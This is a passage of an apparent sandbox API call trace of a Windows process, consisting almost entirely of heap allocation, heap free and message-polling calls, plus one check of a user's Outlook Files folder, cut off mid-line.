0 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4314d10 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0085.666] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0085.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0085.667] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0085.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0085.667] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0085.667] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0085.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0085.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0085.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2360 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0085.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0085.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0085.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0085.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0085.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0085.668] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0085.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0085.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0085.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0085.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0085.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0085.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0085.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0085.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0085.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0085.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0085.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.670] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0085.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0085.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0085.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0085.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0085.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0085.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0085.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0085.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9888 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0085.672] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0085.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.673] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.673] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0085.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.674] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0085.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.674] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files")) returned 0x10 [0085.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0085.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0085.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.674] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0085.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.675] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: 